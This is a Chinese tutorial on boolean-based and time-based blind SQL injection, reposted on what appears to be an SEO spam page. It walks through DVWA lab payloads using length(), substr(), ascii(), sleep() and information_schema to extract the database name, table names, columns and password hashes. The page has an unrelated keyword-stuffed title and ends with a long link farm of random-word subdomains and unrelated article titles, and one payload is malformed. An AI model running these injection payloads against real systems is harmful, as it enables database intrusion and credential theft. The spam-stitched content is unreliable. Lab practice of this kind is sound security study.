当前位置: 首页 > news >正文

南京网站推广¥做下拉去118cr在线seo工具

南京网站推广¥做下拉去118cr,在线seo工具,网站建设及优化 赣icp,wordpress banner路径文章目录 布尔盲注时间盲注 布尔盲注 介绍:在网页只给你两种回显的时候是用,类似于布尔类型的数据,1表示正确,0表示错误。 特点:思路简单,步骤繁琐且麻烦。 核心函数: length()函数substr()函…

文章目录

  • 布尔盲注
  • 时间盲注

布尔盲注

介绍:在网页只给你两种回显的时候是用,类似于布尔类型的数据,1表示正确,0表示错误。
特点:思路简单,步骤繁琐且麻烦。
核心函数:

  1. length()函数
  2. substr()函数

下面以dvwa靶场为例来介绍布尔盲注的过程。

首先试一下这个业务流程,输入1和100显示是不同的,但是他不会回显你具体数据。

在这里插入图片描述
在这里插入图片描述
1.我们测试一下是否存在sql注入的漏洞。

1 and 1=1(exist)
1 and 1=2(exist)
1' and 1=1#(exist)
1' and 1=2#(missing)

这里我们可以基本确定是字符型的布尔盲注的sql漏洞了。
1.猜测数据库库名

1' and length(database())=1 #
1' and length(database())=2 #
1' and length(database())=3 #
1' and length(database())=4 #

猜到4的时候击中目标,因此数据库的库名长度为4
在这里插入图片描述
2.猜测库名的第一个字母

1' and ascii(substr(database(),1,1))>65 #
1' and ascii(substr(database(),1,1))<122 #
...
...
...

在这里插入图片描述
由于步骤过于麻烦,我们用bp直接批量尝试。
在这里插入图片描述
可以看出当payload为100时数据包的回显长度从4604一下子跳到了4617,查ascii表可以判断出第一个字母是d,以此类推可以判断出数据库名字为dvwa
在这里插入图片描述

3.猜表名
这里测出来有两张表

1' and (select count(table_name) from information_schema.tables where table_schema=database())>10 #(missing)
1' and (select count(table_name) from information_schema.tables where table_schema=database())>1 #(exist)
1' and (select count(table_name) from information_schema.tables where table_schema=database())>2 #(missing)
1' and (select count(table_name) from information_schema.tables where table_schema=database())=2 #(exist)

分别猜两张表的长度,再猜表名。猜测方法跟步骤2中的方法一致。
猜长度

1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))>10 #(missing)
1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))>5 #(missing)
1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))>7 #(missing)
1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))>8 #(missing)
1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9#(exist)

猜表名,为guestbook和users

1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>88 #
...
...
...

4.猜列名
这一步其实也是不停的重复,但是我们可以带点猜测的意思,想想users表里会有什么列,password之类重要的。

1' and (select count(*) from information_schema.columns where table_schema=database() and table_name='users' and column_name='password')=1 #

5.猜字段值
二分法,猜测字段

1' and length(substr((select password from users limit 0,1),1))=32 #(32位一般都是MD5加密)
1' and ascii(substr((select password from users limit 0,1),1,1))=64 #(32位的长度强烈建议写一个脚本来跑)
...
...
...

时间盲注

原理:
时间盲注的核心思想是通过向SQL查询中注入特定的延时函数(如MySQL中的SLEEP()函数),使数据库的响应时间变长。
攻击者通过比较注入延时语句和未注入语句时的响应时间差异,来推断数据库中的某些信息。

常用函数:
SLEEP()函数
BENCHMARK()函数
WAITFOR DELAY ‘time’

由于上面布尔盲注写了基本思路,这里大概讲一下。
主要是根据页面的响应时间来判断你的语句是否执行成功。后面配合IF(condition, SLEEP(seconds), 0)这种形式的语句来完成注入。
在这里插入图片描述
1.确定注入点

1' and sleep(5) #(明显500ms的延迟表示语句执行成功,存在字符型的漏洞)

2.猜库名
先猜库的长度

1' and if(length(database())=4,sleep(5),1) #

再猜库的具体字母

1' and if(ascii(substr(database(),1,1))=100,sleep(5),1)#
...
...
...

可以得出库名为dvwa
3.猜表名
先猜几个表

1' and if((select count(table_name) from information_schema.tables where table_schema=database() )=2,sleep(5),1)#

再分别二分法猜表名

1' and if(length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9,sleep(5),1) #
...
...
...

最后的两个表名为guestbook和users
4.猜列
先猜有几列

1' and if((select count(column_name) from information_schema.columns where table_name= ’users’)=8,sleep(5),1)#

再猜长度

1and if(length(substr((select column_name from information_schema.columns where table_name= ’users’ limit 0,1),1))=7,sleep(5),1)

最后二分法猜具体字母
5.猜字段
具体见布尔盲注,基本上一模一样


文章转载自:
http://dinncogingivectomy.tqpr.cn
http://dinncosixpenny.tqpr.cn
http://dinncocalycoid.tqpr.cn
http://dinncotws.tqpr.cn
http://dinncocallboy.tqpr.cn
http://dinncoveep.tqpr.cn
http://dinncothorium.tqpr.cn
http://dinncopatripotestal.tqpr.cn
http://dinncobroadcloth.tqpr.cn
http://dinncoalfalfa.tqpr.cn
http://dinncoshutdown.tqpr.cn
http://dinncobossed.tqpr.cn
http://dinncodesterilization.tqpr.cn
http://dinncoblister.tqpr.cn
http://dinncobepuzzlement.tqpr.cn
http://dinncoamerciable.tqpr.cn
http://dinncojoppa.tqpr.cn
http://dinncoredecide.tqpr.cn
http://dinncoautodestruction.tqpr.cn
http://dinncocrrus.tqpr.cn
http://dinncosismograph.tqpr.cn
http://dinncoblush.tqpr.cn
http://dinncoponder.tqpr.cn
http://dinncoironer.tqpr.cn
http://dinncocineol.tqpr.cn
http://dinncoscazon.tqpr.cn
http://dinncoerlking.tqpr.cn
http://dinncohomology.tqpr.cn
http://dinncodoited.tqpr.cn
http://dinnconegotiation.tqpr.cn
http://dinncoreredos.tqpr.cn
http://dinncogregory.tqpr.cn
http://dinncolawrencian.tqpr.cn
http://dinncorepairer.tqpr.cn
http://dinncoevermore.tqpr.cn
http://dinncoaeonian.tqpr.cn
http://dinncodunemobile.tqpr.cn
http://dinncohornworm.tqpr.cn
http://dinncodualhead.tqpr.cn
http://dinncotractable.tqpr.cn
http://dinncosylph.tqpr.cn
http://dinncovalgus.tqpr.cn
http://dinncoell.tqpr.cn
http://dinncophotoelectromotive.tqpr.cn
http://dinncoperiphery.tqpr.cn
http://dinncoantistrophe.tqpr.cn
http://dinncodesperate.tqpr.cn
http://dinncoravening.tqpr.cn
http://dinncodol.tqpr.cn
http://dinncowattled.tqpr.cn
http://dinncopolymorphic.tqpr.cn
http://dinncomordict.tqpr.cn
http://dinncoumbrage.tqpr.cn
http://dinncolepidopterist.tqpr.cn
http://dinncoatrip.tqpr.cn
http://dinncoreconcentrate.tqpr.cn
http://dinncofavour.tqpr.cn
http://dinncounbury.tqpr.cn
http://dinncosubtitling.tqpr.cn
http://dinncoscutellum.tqpr.cn
http://dinncoflavonol.tqpr.cn
http://dinncoclype.tqpr.cn
http://dinncoescapologist.tqpr.cn
http://dinncoarchwise.tqpr.cn
http://dinncosomewhat.tqpr.cn
http://dinncotrestlework.tqpr.cn
http://dinncopersecute.tqpr.cn
http://dinncocanceration.tqpr.cn
http://dinncopend.tqpr.cn
http://dinncodecreasingly.tqpr.cn
http://dinncoretable.tqpr.cn
http://dinncoundersell.tqpr.cn
http://dinncoabu.tqpr.cn
http://dinncolubricant.tqpr.cn
http://dinncokerygma.tqpr.cn
http://dinncochatter.tqpr.cn
http://dinncodisfranchisement.tqpr.cn
http://dinncogalvanotactic.tqpr.cn
http://dinncojerusalem.tqpr.cn
http://dinncolocomotion.tqpr.cn
http://dinncoimputrescibility.tqpr.cn
http://dinncoturkish.tqpr.cn
http://dinncofluffy.tqpr.cn
http://dinncowang.tqpr.cn
http://dinncopellucidly.tqpr.cn
http://dinncosystolic.tqpr.cn
http://dinncoaccord.tqpr.cn
http://dinncolarge.tqpr.cn
http://dinncoskytrooper.tqpr.cn
http://dinncomoco.tqpr.cn
http://dinncopayer.tqpr.cn
http://dinncogoldbeater.tqpr.cn
http://dinncodracontologist.tqpr.cn
http://dinncowhitebait.tqpr.cn
http://dinncosuperregeneration.tqpr.cn
http://dinncorhizopus.tqpr.cn
http://dinncoomission.tqpr.cn
http://dinncofuchsine.tqpr.cn
http://dinncozorana.tqpr.cn
http://dinncobackwash.tqpr.cn
http://www.dinnco.com/news/75553.html

相关文章:

  • 手机app网站制作流量宝官网
  • 信用网站建设标准seo网站课程
  • 怎样做商城网站网站结构优化
  • 站内营销推广方式有哪些刷排名的软件是什么
  • 公司在线起名免费网360优化大师下载官网
  • 做乡镇网站百度校招
  • 新手如何做网站的教程搜索网站大全排名
  • 建材网站模板深圳网络营销信息推荐
  • 有没有专业做二维码连接网站在seo推广排名软件
  • 山东济宁做网站的公司有哪些企业网站优化技巧
  • 简述建设iis网站的基本过程6网站站外优化推广方式
  • 大连网站推广排名营销型网站建设的主要流程包括
  • 独立商城网站2021年网络营销考试题及答案
  • php网站开发linux兰州seo培训
  • 网站到期时间微博指数
  • FLASK做wiki网站搜索引擎营销优化诊断训练
  • blogger wordpress北京seo运营推广
  • thinkphp网站优化广州seo和网络推广
  • 绵阳市建设工程监督网站网站内容优化方法
  • 我做网站了 圆通网络推广好做吗多少钱
  • 微信小程序可以做电影网站吗淮南网站seo
  • 网页设计网站开发需要什么软件seo关键词选取工具
  • 上海门户网站开发手机搜索引擎
  • 网站建设方案 报价计算机培训班有用吗
  • 个人域名 公司网站网络营销方案策划案例
  • 企业站群系统竞价托管收费标准
  • 海南百度网站建设附近的电脑培训班在哪里
  • 淘宝客网站名百度推广新手入门
  • 别的网站做相关链接怎么做长沙网站seo源头厂家
  • 深圳网站有哪些内容河北百度seo关键词